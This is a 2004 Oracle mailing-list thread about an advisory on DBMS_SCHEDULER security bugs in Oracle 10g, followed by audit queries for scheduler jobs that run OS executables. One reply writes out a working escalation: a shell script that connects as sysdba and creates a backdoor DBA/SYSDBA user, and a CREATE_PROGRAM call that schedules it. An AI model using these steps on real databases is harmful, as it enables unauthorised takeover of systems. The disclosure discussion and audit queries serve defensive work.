
Re[2]: PeteFinnigan.com Oracle advisory for bugs in dbms_scheduler ( alert #68)

From: Jonathan Gennick <jonathan_at_gennick.com>
Date: Thu, 2 Sep 2004 16:16:23 -0400
Message-ID: <351326433961.20040902161623@gennick.com>


Well, the whole world knows now...

Best regards,

Jonathan Gennick --- Brighten the corner where you are http://Gennick.com * 906.387.1698 * mailto:jonathan@gennick.com

Join the Oracle-article list and receive one article on Oracle technologies per month by email. To join, visit http://five.pairlist.net/mailman/listinfo/oracle-article, or send email to Oracle-article-request_at_gennick.com and include the word "subscribe" in either the subject or body.

Thursday, September 2, 2004, 12:00:41 PM, Gogala, Mladen (Mladen.Gogala_at_aetn.com) wrote:

GM> What annoys me the most is that the bug is so trivial 
GM> that it should have been discovered during the beta test.
GM> You and Pete didn't specify how exactly is it possible, probably
GM> out of the goodness of your heart, so I did a little investigation
GM> of my own, and discovered that Oracle10g allows shell scripts to
GM> be scheduled using DBMS_SCHEDULER. Of course, DBMS_SCHEDULER still
GM> uses job queue processes owned by user oracle to schedule those
GM> shell scripts. The thing that can be done is to schedule a shell
GM> script containing the following sequence:
GM> #!/bin/ksh
GM> set -a 
GM> echo "Operator, are you pondering what I am pondering?">/dev/console
GM> ORAENV_ASK=NO
GM> ORACLE_SID=<sid>
GM> . /usr/local/bin/oraenv
GM> sqlplus "/ as sysdba"<<EOF
GM> create user brain identified by takeover
GM> default tablespace system;
GM> grant connect,resource,dba to brain;
GM> grant sysdba to brain;
GM> EOF

GM> If this script is executed by a process owned by user "oracle",
GM> "connect / as sysdba" will succeed. The database is mine.

GM> All you need to do is to run something like this:

GM> BEGIN
GM> DBMS_SCHEDULER.CREATE_PROGRAM (
GM>    program_name           => 'take_over_the_world',
GM>    program_action         => '/tmp/pinky_and_the_brain',
GM>    program_type           => 'EXECUTABLE',
GM>    comments               => 'I rulez');
GM> END;
GM> /

GM> and you are ready to create the job and run it. I was astonished 
GM> how simple and trivial the flaw is. Someone should have thought of
GM> that during beta testing. Now, let me put on a wide smile and ask:
GM> is that the bug that you and Pete have found?
GM> --
GM> Mladen Gogala
GM> Oracle DBA
GM> email:mladeng_at_aetvn.com
GM> Ext: 9787


>> -----Original Message-----
>> From: Jonathan Gennick [mailto:jonathan_at_gennick.com]
>> Sent: Thursday, September 02, 2004 8:33 AM
>> To: Pete Finnigan
>> Cc: oracle-l_at_freelists.org
>> Subject: Re: PeteFinnigan.com Oracle advisory for bugs in
>> dbms_scheduler (alert #68)
>>
>>
>> This alert apparently covers several flaws. I'm actually
>> taken aback by how long it's taken Oracle to respond to the
>> one Pete and I uncovered back in March, which lets you
>> leverage the new scheduler to gain access to the Oracle user,
>> and thence to grant yourself DBA privileges.
>>
>> Best regards,
>>
>> Jonathan Gennick --- Brighten the corner where you are
>> http://Gennick.com * 906.387.1698 * mailto:jonathan@gennick.com



GM> Wednesday, September 1, 2004, 3:06:15 PM, Pete Finnigan
GM> (oracle_list_at_peterfinnigan.demon.co.uk) wrote:
PF>> Hi everyone,
PF>> Oracle released last night alert #68 covering fixes for many 
PF>> security bugs in Oracle. PeteFinnigan.com found security bugs in the 
PF>> new 10gR1 scheduler functionality. Our security advisory can be 
PF>> found at http://www.petefinnigan.com/alerts.htm

PF>> Kind regards

PF>> Pete


---
To unsubscribe - mailto:oracle-l-request_at_freelists.org&subject=unsubscribe 
To read recent messages - http://freelists.org/archives/oracle-l/09-2004
Received on Thu Sep 02 2004 - 19:13:39 CDT
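
The thread above turns on DBMS_SCHEDULER programs of type EXECUTABLE being run by job queue processes owned by the "oracle" OS user. The queries below are an added example, not part of the original messages or of the advisory, showing how a DBA can audit for that exposure from the data dictionary; they assume SELECT access to the DBA_* views.

```sql
-- Added example (not from the thread): audit scheduler objects that run
-- operating-system executables, and the accounts able to create them.

-- 1. Programs registered as OS executables, as in the CREATE_PROGRAM call
--    quoted in the thread (program_type => 'EXECUTABLE').
SELECT owner, program_name, program_action, enabled
FROM   dba_scheduler_programs
WHERE  program_type = 'EXECUTABLE'
ORDER  BY owner, program_name;

-- 2. Jobs that run an executable, either inline (job_type) or through a
--    named program. job_type is NULL when the job points at a program,
--    hence the outer join to pick up the program's type.
SELECT j.owner,
       j.job_name,
       j.job_type,
       j.job_action,
       j.program_owner,
       j.program_name,
       p.program_action,
       j.enabled,
       j.state
FROM   dba_scheduler_jobs j
       LEFT JOIN dba_scheduler_programs p
              ON  p.owner        = j.program_owner
              AND p.program_name = j.program_name
WHERE  j.job_type     = 'EXECUTABLE'
   OR  p.program_type = 'EXECUTABLE'
ORDER  BY j.owner, j.job_name;

-- 3. Users and roles holding job-creation system privileges.
--    CREATE EXTERNAL JOB is a separate privilege in later Oracle releases;
--    on a release without it the literal simply matches nothing.
--    A grantee may be a role: follow it through DBA_ROLE_PRIVS to find
--    the users who inherit the privilege.
SELECT grantee, privilege, admin_option
FROM   dba_sys_privs
WHERE  privilege IN ('CREATE JOB', 'CREATE ANY JOB', 'CREATE EXTERNAL JOB')
ORDER  BY privilege, grantee;
```

Any row from the first two queries whose action points at a world-writable location such as /tmp, or any unexpected grantee in the third, is worth reviewing.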
